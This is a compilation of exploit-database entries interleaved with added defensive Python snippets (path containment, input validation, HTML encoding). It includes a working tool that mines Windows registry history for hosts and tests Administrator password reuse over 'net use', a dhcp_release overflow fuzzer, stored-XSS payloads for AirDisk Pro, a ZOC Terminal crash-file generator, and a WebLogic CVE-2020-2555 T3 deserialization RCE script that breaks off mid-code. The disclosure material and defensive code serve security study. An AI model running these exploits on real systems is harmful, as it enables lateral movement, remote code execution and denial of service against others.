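The LimeSurvey getZipFile path above and the Bolt CMS rename step earlier on this page come down to the same defect: a file manager joins a user-supplied path onto a base directory without checking where the result lands. As an added example, not LimeSurvey's or Bolt's code, path containment in Python that resolves the candidate with symlinks followed and refuses anything outside the managed directory, applied to both a download-and-delete handler and a rename; the fixture directory and file are constructed.

```python
import os
import tempfile
from pathlib import Path


def resolve_inside(base_dir: str, user_path: str) -> Path:
    """Resolve a user-supplied path and require the result to stay under base_dir.

    The candidate is resolved with symlinks followed, so a link planted inside
    the directory that points outside is caught as well as "../" sequences.
    Traversal values like the LimeSurvey `path` "/../../../../etc/passwd" or
    the Bolt rename target "../../../public/files/test1.php" are refused
    before any file is opened, renamed or deleted.
    """
    if "\x00" in user_path:
        raise ValueError("NUL byte in path")
    base = Path(base_dir).resolve()
    # The value is always interpreted relative to the managed directory,
    # even when it starts with a slash.
    candidate = (base / user_path.lstrip("/\\")).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        raise PermissionError(f"path escapes {base}: {user_path!r}") from None
    return candidate


def get_zip_file(base_dir: str, user_path: str, delete_after: bool = False) -> bytes:
    """Download handler in the shape of getZipFile, with containment first.

    The post-download delete that the advisory identifies as a denial-of-service
    lever is limited to the same contained path, so it can never remove a
    configuration file elsewhere on disk.
    """
    target = resolve_inside(base_dir, user_path)
    if not target.is_file():
        raise FileNotFoundError(user_path)
    data = target.read_bytes()
    if delete_after:
        target.unlink()
    return data


def rename_inside(base_dir: str, old_name: str, new_name: str) -> str:
    """Rename within the managed directory; both names must stay inside it."""
    src = resolve_inside(base_dir, old_name)
    dst = resolve_inside(base_dir, new_name)
    os.rename(src, dst)
    return str(dst.relative_to(Path(base_dir).resolve()))


def build_sample_tree() -> str:
    """Constructed fixture: a managed upload directory with one archive in it."""
    root = tempfile.mkdtemp(prefix="fm_demo_")
    upload = Path(root) / "upload"
    upload.mkdir()
    (upload / "survey.zip").write_bytes(b"PK\x03\x04demo")
    return str(upload)
```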
-
Microsoft NET USE win10 - Insufficient Authentication Logic
# Title: Microsoft NET USE win10 - Insufficient Authentication Logic
# Date: 2020-04-04
# Author: hyp3rlinx
# Vendor: www.microsoft.com
# CVE: N/A

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NET-USE-INSUFFICIENT-PASSWORD-PROMPT.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Windows "net use" Command

Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections.
The command also controls persistent net connections. Used without parameters, net use retrieves a list of network connections.

[Vulnerability Type]
Insufficient Password Prompt

[CVE Reference]
N/A

[Security Issue]
The Windows "net use" network logon type-3 command does not prompt for authentication when the built-in Administrator account
is enabled and both remote and originating systems suffer from password reuse. This also works as "standard" user but
unfortunately we do not gain high integrity privileges. However, it opens the door and increases the attack surface if the
box we laterally move to has other vulnerabilities present.

In contrast, authenticating using the "unc path" "\\x.x.x.x\c$" using an explorer type logon does prompt for credentials as
expected. The authentication mechanism between the two network logon methods is inconsistent and in my opinion leaves an
authentication loophole invitation. Moreover, since this targets the built-in Administrator account, one would think there
would be more or equal security measures in place, not less.

Requirements:
1) Remote system built-in Administrator account is enabled
2) Origination system user's account password and the remote system Administrator password match (reuse).

Typically, to gain Admin privileges on remote logon you may have to create and enable "LocalAccountTokenFilterPolicy" but NOT
in this case. Again, the "LocalAccountTokenFilterPolicy" registry setting does NOT need to exist and is NOT enabled and has no
bearing on the issue. However, if "FilterAdministratorToken" is enabled in the registry on the remote system then the above
loophole scenario fails. Interestingly, the "FilterAdministratorToken" setting does not seem to exist by default in the
Windows registry.

Therefore, if an attacker pops a box they can check "MountPoints2" registry values, usually used by forensic analysts for
previous network connections, and try them, and if there's password reuse (likely) BOOM automagic logon.

This vuln occurs due to inconsistent password dialog prompting depending on whether the "net use" logon method is used.
When testing make sure to logout then log back in after changing passwords so the environment is clean.

e.g.

1) Passwords for both systems are different and remote built-in Administrator account active:

C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator
Enter the password for 'Administrator' to connect to '192.168.x.x':
System error 5 has occurred.

Access is denied.

2) Passwords for both origination system and remote match:

C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator
The command completed successfully.

By the way, as a side note, DCERPC calls work as well if both systems happen to have the same password.

c:\>getmac /s x.x.x.x /U Administrator

MSRC in their response pointed out that "No login prompt on remote connection if both Administrator password are the same."

Ok, but why does "net use" not follow the same pattern as doing a UNC-Path type of logon, where we get the expected cred
dialog box?

Expected result: Consistent password dialog box, no matter if passwords match or not.
Actual Result: No prompt for a password if both systems passwords are the same.

Tested successfully on fully patched Windows 10 using VM, also across LAN to a non-domain connected PC.

[Exploit/POC]
import re
import sys
import time
from subprocess import Popen, PIPE, call
from multiprocessing import Process, Queue

#By John Page (aka hyp3rlinx)
#Apparition Security
#twitter.com/hyp3rlinx
#-----------------------------------
#When a remote systems built-in Administrator account is enabled and both the remote and the target system
#passwords match (password reuse) theres no prompt for credentials and we get logged in automagically.
#
#MountPoints2 and Terminal server client hints in the Windows registry can help us.
#Typically, MountPoints2 is used by Forensic analysts to help determine where an attacker laterally moved to previously.
#REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##"  (we want network logons)
#MountPoints2 key entries are stored like '##10.2.1.40#c$'
#-----------------------------------------------------------

BANNER = r"""
    _   ______________   ___    ____  __  _______ ______
   / | / / ____/_  __/  /   |  / __ )/ / / / ___// ____/
  /  |/ / __/   / /    / /| | / __  / / / /\__ \/ __/
 / /|  / /___  / /    / ___ |/ /_/ / /_/ /___/ / /___
/_/ |_/_____/ /_/    /_/  |_/_____/\____//____/_____/

By Hyp3rlinx
ApparitionSec
"""

DRIVE = "X"
FINDME = "The command completed successfully."
# Raw strings: the registry paths contain backslashes that must not be read as escapes.
REG_MOUNT2 = r'REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##"'
REG_RDPUSERS = r'REG Query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s'
VULN_FOUND = set()
DELAY = 2  #Any lower and we may get inaccurate results.
rdp_server_lst = []


#Return prior network logons to remote systems.
def mountpoints2():
    mntpoint2_connections = []
    try:
        p = Popen(REG_MOUNT2, stdout=PIPE, stderr=PIPE, shell=True, universal_newlines=True)
        tmp = p.stdout.readlines()
    except Exception as e:
        print("[!] " + str(e))
        return False
    for x in tmp:
        idx = x.find("##")
        clean = x[idx:]
        idx2 = clean.rfind("#")
        ip = clean[2:idx2]
        ip = re.sub(r"#.*[A-Z,a-z]", "", ip)
        if ip not in mntpoint2_connections:
            mntpoint2_connections.append(ip)
    mntpoint2_connections = list(filter(None, mntpoint2_connections))
    p.kill()
    return mntpoint2_connections


#Terminal server client stores remote server connections.
def rdp_svrs():
    global rdp_server_lst
    try:
        p = Popen(REG_RDPUSERS, stdout=PIPE, stderr=PIPE, shell=True, universal_newlines=True)
        tmp = p.stdout.readlines()
        for key in tmp:
            if key.find("Servers") != -1:
                pos = key.rfind("\\")
                srv = key[pos + 1:].replace("\r\n", "").strip()
                rdp_server_lst.append(srv)
        p.kill()
    except Exception as e:
        print("[!] " + str(e))
        return False
    return True


#Disconnect
def del_vuln_connection(ip):
    try:
        print("[!] Disconnecting vuln network logon connection.\n")
        call(r"net use " + DRIVE + ":" + " /del")
    except Exception as e:
        print("[!] " + str(e))


#Check connection
def chk_connection(ip):
    print("[+] Testing: " + ip)
    sys.stdout.flush()
    cmd = Popen(['ping.exe', ip, "-n", "1"], stderr=PIPE, stdout=PIPE, shell=True, universal_newlines=True)
    #communicate() returns (stdout, stderr); ping writes its reply text to stdout.
    stdout, stderr = cmd.communicate()
    if "Reply from" in stdout and "Destination host unreachable" not in stdout:
        print("[*] Target up!")
        return True
    else:
        print("[!] Target unreachable :(")
        return False


#Test vuln
def Test_Password_Reuse(ip, found_q=None):
    print("[+] Testing " + ip + " the builtin Administrator account.\n")
    sys.stdout.flush()
    try:
        p = Popen("net use " + DRIVE + ": \\\\" + ip + "\\c$ /user:Administrator",
                  stdout=PIPE, stderr=PIPE, shell=True, universal_newlines=True)
        err = p.stderr.readlines()
        if err:
            e = str(err)
            if e.find("error 53") != -1:
                print("[*] Network path not found\n")
                return
            elif e.find("error 1219") != -1:
                print("[*] Target connections to a server or shared resource by the same user, using more than one user name are disallowed.\n")
                return
            elif e.find("error 85") != -1:
                print("[*] The local device name is already in use.\n")
                return
            else:
                print(e + "\n")
        tmp = p.stdout.read()
        if FINDME in tmp:
            print("[*] Password reuse for the built-in Administrator found!")
            print("[+] Connected to target: " + ip)
            VULN_FOUND.add(ip + ":Administrator")
            #This runs in a child process, so the result must travel back through the queue.
            if found_q is not None:
                found_q.put(ip + ":Administrator")
            del_vuln_connection(ip)
        p.kill()
    except Exception as e:
        print("[!] " + str(e))


#Authenticate
def auth(ip):
    found_q = Queue()
    action_process = Process(target=Test_Password_Reuse, args=(ip, found_q))
    action_process.start()
    action_process.join(timeout=5)
    action_process.terminate()
    while not found_q.empty():
        VULN_FOUND.add(found_q.get())


if __name__ == "__main__":
    print(BANNER)
    print("[+] Windows 'net use' Network Logon Type-3")
    print("[+] Insufficient Password Prompt")
    print("[+] By hyp3rlinx\n")
    time.sleep(3)
    print("[+] Deleting any existing network logons to start clean.")
    #Make sure no existing sessions are left over.
    call(r"net use * /del /y")
    sys.stdout.flush()
    time.sleep(1)

    #Grab previous connections from MountPoints2 if any.
    rdp_svrs()
    svrlst = mountpoints2()
    if svrlst:
        #Extend the MountPoints2 hits with the RDP client history.
        svrlst += rdp_server_lst
    else:
        svrlst = rdp_server_lst

    if not svrlst:
        print("[*] No MountPoints2 artifacts found, enter an IP.")
        sys.stdout.flush()
        ip = input("[+] Target IP> ")
        if chk_connection(ip):
            auth(ip)
    else:
        #We have MountPoints2 or RDP Server list IP we can try.
        for ip in svrlst:
            if chk_connection(ip):
                auth(ip)
            time.sleep(DELAY)

        if len(VULN_FOUND) != 0:
            print("[*] Located the following vulnerable systems:")
            sys.stdout.flush()
            for v in VULN_FOUND:
                print("[+] " + v)
        else:
            print("[+] All previous attempts failed, enter an IP and give it a shot!.")
            sys.stdout.flush()
            ip = input("[+] Target IP> ")
            if chk_connection(ip):
                auth(ip)

[POC Video URL]
https://www.youtube.com/watch?v=Je93Neb0k8g

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: February 28, 2020
MSRC "behavior you are reporting is by design" : March 30, 2020
April 5, 2020 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or
otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by
reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and
similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c).
hyp3rlinx
-
dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)
# Exploit Title: dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)
# Date: 2020-04-06
# Exploit Author: Josue Encinar
# Software Link: https://launchpad.net/ubuntu/+source/dnsmasq/2.79-1
# Version: 2.79
# Tested on: Ubuntu 18.04

from subprocess import Popen, PIPE

data = ""
bof = False
for i in range(1, 200):
    A = "A" * i
    data = f"dhcp_release {A} 1 1"
    try:
        result = Popen(data, stdout=PIPE, stderr=PIPE, shell=True)
        error = result.stderr.read().decode()
        if "Aborted (core dumped)" in error:
            print("[+] Buffer Overflow detected!")
            print(f"[*] Offset: {i}")
            bof = True
            break
    except Exception as e:
        print(f"[-] {e}")

if not bof:
    print("[-] No buffer overflow...")

## Check line 273 in dhcp_release.c
### strcpy(ifr.ifr_name, argv[1]);
#
## PoC:
# josue@ubuntu:~/Escritorio/bof_dhcp$ python3 dhcp_release_bof.py
# *** buffer overflow detected ***: dhcp_release terminated
# [+] Buffer Overflow detected!
# [*] Offset: 16
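The PoC traces the abort to strcpy(ifr.ifr_name, argv[1]) into a fixed-size struct ifreq, and the offset of 16 it reports is IFNAMSIZ on Linux. As an added example, not part of dnsmasq-utils or of the PoC, a Python wrapper that validates all three dhcp_release arguments before building an argv list, so an oversize interface name is rejected before any copy and nothing passes through /bin/sh; the argument values in the test are constructed.

```python
import ipaddress
import re
import subprocess
from typing import List

# Linux IFNAMSIZ is 16 bytes including the terminating NUL, so the longest
# interface name the kernel accepts is 15 characters. This is the bound the
# strcpy() into ifr.ifr_name at dhcp_release.c line 273 does not enforce,
# which is why the PoC above finds an offset of 16.
IFNAMSIZ = 16
IFNAME_RE = re.compile(r"^[A-Za-z0-9_.:-]+$")
MAC_RE = re.compile(r"^[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}$")


def validate_ifname(name: str) -> str:
    """Reject anything that would not fit, NUL included, in struct ifreq."""
    if not name or len(name.encode("utf-8")) >= IFNAMSIZ:
        raise ValueError(f"interface name must be 1-{IFNAMSIZ - 1} bytes: {name!r}")
    if not IFNAME_RE.fullmatch(name):
        raise ValueError(f"invalid character in interface name: {name!r}")
    return name


def build_dhcp_release_argv(ifname: str, client_ip: str, client_mac: str) -> List[str]:
    """Return the argv for dhcp_release after checking every argument.

    Hypothetical wrapper (not part of dnsmasq-utils): the list form keeps the
    values out of /bin/sh, and the checks keep oversize names away from the
    fixed-size copy. ipaddress raises ValueError for junk such as "1".
    """
    validate_ifname(ifname)
    ipaddress.IPv4Address(client_ip)
    if not MAC_RE.fullmatch(client_mac):
        raise ValueError(f"invalid MAC address: {client_mac!r}")
    return ["dhcp_release", ifname, client_ip, client_mac.lower()]


def run_dhcp_release(ifname: str, client_ip: str, client_mac: str) -> int:
    """Invoke the real binary (needs root and dnsmasq-utils) and return its exit code."""
    argv = build_dhcp_release_argv(ifname, client_ip, client_mac)
    return subprocess.run(argv, check=False).returncode
```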
-
AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting
# Title: AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting # Author: Vulnerability Laboratory # Date: 2020-04-15 # Vendor: http://www.app2pro.com # Software Link: https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421 # CVE: N/A Document Title: =============== AirDisk Pro v5.5.3 iOS - Multiple Persistent Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2203 Release Date: ============= 2020-04-15 Vulnerability Laboratory ID (VL-ID): ==================================== 2203 Common Vulnerability Scoring System: ==================================== 4.5 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 1.000€ - 2.000€ Product & Service Introduction: =============================== File sharing with other iOS devices via Bluetooth or Wi-Fi connection with automatic search of nearest devices. Users can perform file operations on the application like: Copy, Move, Zip, Unzip, Rename, Delete, Email, and more. Easy to create file like: Text File, New folder, Playlist, Take Photo/Video, Import From Library, and Voice Record. AirDisk Pro allows you to store, view and manage files on your iPhone, iPad or iPod touch. You can connect to AirDisk Pro from any Mac or PC over the Wi-Fi network and transfer files by drag & drop files straight from the Finder or Windows Explorer. AirDisk Pro features document viewer, PDF reader, music player, image viewer, voice recorder, text editor, file manager and support most of the file operations: like delete, move, copy, email, share, zip, unzip and more. 
(Copy of the Homepage: https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421 ) (Copy of the Homepage: http://www.app2pro.com ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple persistent web vulnerabilities in the AirDisk Pro v5.5.3 ios mobile application. Affected Product(s): ==================== Felix Yew Product: AirDisk Pro v5.5.3 (iOS) Vulnerability Disclosure Timeline: ================================== 2020-04-15: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== No authentication (guest) User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ Multiple persistent cross site scripting vulnerability has been discovered in the official SuperBackup v2.0.5 ios mobile application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise the mobile web-application from the application-side. The first vulnerability is located in the `createFolder` parameter of the `Create Folder` function. Attackers are able to name or rename paths via airdisk pro ui to malicious persistent script codes. Thus allows to execute the persistent injected script code on the front site of the path index listing in the content itself on each refresh. The request method to inject is POST and the attack vector is located on the application-side. Interaction to exploit is as well possible through the unauthenticated started ftp service on the local network. The second vulnerability is located in the `deleteFile` parameter of the `Delete` function. 
The script code executes in the popup that asks for confirmation before deletion. The injection point is the file parameter and the execution point is the visible delete popup with the confirmation question. The request method to inject is POST and the attack vector is located on the application-side.

The third web vulnerability is located in the `devicename` parameter that is displayed at the top next to the AirDisk Pro UI logo. Remote attackers are able to inject their own malicious persistent script code by manipulating the local Apple device name. The injection point is the devicename information and the execution point is the file sharing UI panel of the AirDisk Pro mobile web-application.

Remote attackers are able to inject their own script code into the vulnerable client-side requested web-application parameters. The attack vector of the vulnerability is persistent and the request method to inject/execute is POST. The vulnerabilities are classic client-side cross site scripting vulnerabilities. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] AirDisk pro Wifi UI

Vulnerable Parameter(s):
[+] createFolder
[+] deleteFile
[+] devicename

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by remote attackers with wifi access and low user interaction. For security demonstration or to reproduce the vulnerability, follow the provided information and steps below.

1. Create Folder PoC:
Vulnerable Source
<tbody>
<form name="checkbox_form"></form>
<tr><td class="e"><input type="checkbox" name="selection" value="test"></td><td class="i"><a href="test/"><img src="/webroot/fileicons/folder.png" width="20" height="20"></a></td><td class="n"><a href="test/">test</a></td><td class="m">11 Apr 2020 at 12:35</td><td class="s"></td><td class="k">Folder</td>
<td class="e"><span style="height:15px; width:15px;"> </span></td><td class="e"><a href="#" title="Rename file" onclick="modalPopup("test", 0, 0);"> <img src="/webroot/webrename.png" width="15" height="15"></a></td><td class="e"><a href="#" title="Delete file" onclick="modalPopup("test", 2, 0);"> <img src="/webroot/webdelete.png" width="15" height="15"></a></td></tr>
<tr class="c"><td class="e"><input type="checkbox" name="selection" value="test%3E%22%3Ciframe%20src=a%3E"></td><td class="i"><a href="[MALICIOUS INJECTED SCRIPT CODE!]test%3E%22%3Ciframe%20src=evil.source%3E/"> <img src="/webroot/fileicons/folder.png" width="20" height="20"></a></td><td class="n">
<a href="[MALICIOUS INJECTED SCRIPT CODE!]test%3E%22%3Ciframe%20src=evil.source%3E/">test>"<iframe src="evil.source"></a></td>
<td class="m">11 Apr 2020 at 13:01</td><td class="s"></td><td class="k">Folder</td><td class="e"><span style="height:15px; width:15px;"> </span></td><td class="e">
<a href="#" title="Rename file" onClick="modalPopup("test%3E%22%3Ciframe%20src=evil.source%3E"[MALICIOUS INJECTED SCRIPT CODE!];, 0, 1);"> <img src="/webroot/webrename.png" width="15" height="15"/></a></td><td class="e">
<a href="#" title="Delete file" onClick="modalPopup("test%3E%22%3Ciframe%20src=evil.source%3E"[MALICIOUS INJECTED SCRIPT CODE!];, 2, 1);"> <img src="/webroot/webdelete.png" width="15" height="15"/></a></td></tr>
<tr><td class="e"><input type="checkbox" name="selection" value="Help.webarchive" /></td>
<td class="i"><a href="Help.webarchive"><img src="/webroot/fileicons/webarchive.png" width="20" height="20"></a></td><td class="n">
<a href="Help.webarchive">Help.webarchive</a></td><td class="m">6 Dec 2019 at 05:22</td><td class="s">13.7 KB</td><td class="k">Safari Web Archive</td> <td class="e"><a href="#" title="Download file" onClick="downloadFile("Help.webarchive");"><img src="/webroot/webdownload.png" width="15" height="15"/></a></td><td class="e"><a href="#" title="Rename file" onClick="modalPopup("Help.webarchive", 0, 2);"> <img src="/webroot/webrename.png" width="15" height="15"/></a></td><td class="e"><a href="#" title="Delete file" onClick="modalPopup("Help.webarchive", 2, 2);"><img src="/webroot/webdelete.png" width="15" height="15"/></a></td></tr> </form> </tbody> </table> </div> --- PoC Session logs [POST] --- http://localhost:80/ Host: localhost:80 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 68 Origin: http://localhost:80 Connection: keep-alive Referer: http://localhost:80/ Upgrade-Insecure-Requests: 1 createFolder=test>"<[MALICIOUS INJECTED SCRIPT CODE!]>&ID=0&submitButton=Create - POST: HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 6257 Note: Adding via ftp on mkdir or file is as well possible without authentication on default setup. 2. 
Delete / Old Popup PoC: Vulnerable Source <div id="modal-content" class="simplemodal-data" style="display: block;"> <div id="modal-title"><h3>Delete File</h3></div> <div id="modal-text"><a>Are you sure you want to delete this file?"test"</a></div> <form name="input" action="" method="post"> <div id="modal-field"><input type="hidden" name="deleteFile" value="test"<iframe src="evil.source">[MALICIOUS INJECTED SCRIPT CODE]"></div> <input type="hidden" name="ID" id="ID" value="test"> <input type="submit" name="submitButton" id="submitButton" value="Delete"> </form> </div> --- PoC Session logs [POST] --- http://localhost:80/ Host: localhost:80 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 55 Origin: http://localhost:80 Connection: keep-alive Referer: http://localhost:80/evil.source Upgrade-Insecure-Requests: 1 deleteFile=New Folder&ID=New Folder&submitButton=Delete - POST: HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 4699 Note: Comes up when somebody tries to delete the malicious injected path. 3. 
Devicename PoC: Vulnerable Source <div id="headerWraper"> <table border="0" cellspacing="0" cellpadding="0" width="100%"> <tr> <td><a href="./"><img src="/webroot/webicon.png" id="headerImg" width="57" height="57"/></a></td> <td><h2>[MALICIOUS INJECTED SCRIPT CODE AS DEVICENAME]</h2></td> </tr> </table> </div> --- PoC Session logs [GET] --- http://localhost:80/ Host: localhost:80 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 55 Origin: http://localhost:80 Connection: keep-alive Referer: http://localhost:80/evil.source Upgrade-Insecure-Requests: 1 - GET: HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 4612 Note: Executes each time the wifi sharing ui service of airdisk pro is opened by the local or remote users. Solution - Fix & Patch: ======================= 1. Disallow special chars in the folder and filenames. Sanitize all inputs and filter all involved parameters to prevent application-side attacks. 2. Parse the output location of the popup permission message content to prevent further executions after injects via post method. 3. Sanitize the devicename displayed on top of the wifi user interaction by a secure parsing mechanism. Security Risk: ============== The security risk of the persistent input validation web vulnerabilities in the application functions are estimated as medium. Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. 
Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material, contact (admin@ or research@) to ask for permission.

Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
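The three sinks the PoCs above show (the listing row with its `onclick="modalPopup(...)"` handlers, the delete popup with its `deleteFile` field, and the `<h2>` device name) each sit in a different output context and need a matching encoder. The Python below is an added illustration of the fixes listed in the Solution section; it is not AirDisk Pro code, the row layout is modelled on the vulnerable source above, and the folder-name allow-list is an assumed policy.

```python
import html
import json
import re
from urllib.parse import quote

# Constructed sample: the folder name the advisory's PoC injects via createFolder.
POC_NAME = 'test>"<iframe src=evil.source>'

# Assumed allow-list for createFolder / rename input (fix item 1): letters, digits,
# space, dot, underscore, dash. HTML metacharacters and path separators never pass.
FOLDER_NAME_RE = re.compile(r'[A-Za-z0-9 ._-]{1,255}')


def is_safe_folder_name(name: str) -> bool:
    """Reject anything outside the allow-list plus the '.' / '..' path entries."""
    if name in ('.', '..'):
        return False
    return FOLDER_NAME_RE.fullmatch(name) is not None


def html_text(s: str) -> str:
    """Encode for an HTML text node: the <a> link text and the <h2> devicename."""
    return html.escape(s, quote=False)


def html_attr(s: str) -> str:
    """Encode for a double-quoted HTML attribute value (checkbox value, hidden deleteFile)."""
    return html.escape(s, quote=True)


def js_string_in_attr(s: str) -> str:
    """Encode for a JS string literal inside an event-handler attribute, the
    modalPopup(...) argument. The browser decodes the attribute first and hands the
    result to the JS parser, so: JSON-escape for JS, then attribute-escape for HTML."""
    return html_attr(json.dumps(s))


def render_row(name: str, index: int) -> str:
    """One listing row with every sink encoded for its context (fix item 1 output side)."""
    href = quote(name, safe='') + '/'  # percent-encode the path segment for the URL
    return (
        f'<tr><td class="e"><input type="checkbox" name="selection" value="{html_attr(name)}"></td>'
        f'<td class="n"><a href="{html_attr(href)}">{html_text(name)}</a></td>'
        f'<td class="e"><a href="#" title="Rename file" onclick="modalPopup({js_string_in_attr(name)}, 0, {index});">rename</a></td>'
        f'<td class="e"><a href="#" title="Delete file" onclick="modalPopup({js_string_in_attr(name)}, 2, {index});">delete</a></td></tr>'
    )


def render_delete_prompt(name: str) -> str:
    """The delete confirmation popup with the reflected name encoded (fix item 2)."""
    return (
        f'<div id="modal-text"><a>Are you sure you want to delete this file? "{html_text(name)}"</a></div>'
        f'<input type="hidden" name="deleteFile" value="{html_attr(name)}">'
    )


def render_header(devicename: str) -> str:
    """The header <h2> showing the device name, encoded as a text node (fix item 3)."""
    return f'<h2>{html_text(devicename)}</h2>'
```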
-
ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)
# Exploit Title: ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.emtec.com
# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe
# Tested Version: 7.25.5
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to produce the crash:
# 1.- Run python code: ZOC_7.25.5_Script.py and it will create a new file "exp.zrx"
# 2.- Open ZOC Terminal
# 3.- Select Script > Start REXX Script...
# 4.- Select "ZOC_7.25.5_Script.zrx" file and click "open"
# 5.- Crashed

# Build an oversized REXX script file: 20000 'A' (0x41) bytes
cod = "\x41" * 20000
f = open('ZOC_7.25.5_Script.zrx', 'w')
f.write(cod)
f.close()
-
Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution
# Exploit Title: Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution
# Author: nu11secur1ty
# Date: 2020-03-31
# Vendor: Oracle
# Software Link: https://download.oracle.com/otn/nt/middleware/12c/122140/fmw_12.2.1.4.0_wls_Disk1_1of1.zip
# Exploit link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-2555
# CVE: CVE-2020-2555

[+] Credits: Ventsislav Varbanovski (nu11secur1ty)
[+] Source: readme from GitHUB

[Exploit Program Code]
--------------------------
#!/usr/bin/python
# @nu11secur1ty
import socket
import os
import sys
import struct

# Three arguments are required (host, port, payload path), so argv needs 4 entries
if len(sys.argv) < 4:
    print 'Usage: python %s <host> <port> </path/to/payload>' % os.path.basename(sys.argv[0])
    sys.exit()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
server_address = (sys.argv[1], int(sys.argv[2]))
print '[+] Connecting to %s port %s' % server_address
sock.connect(server_address)

# Send headers
headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
print 'sending "%s"' % headers
sock.sendall(headers)
data = sock.recv(1024)
print >>sys.stderr, 'received "%s"' % data

# Serialized object to embed, read from the file given as the third argument
payloadObj = open(sys.argv[3],'rb').read()
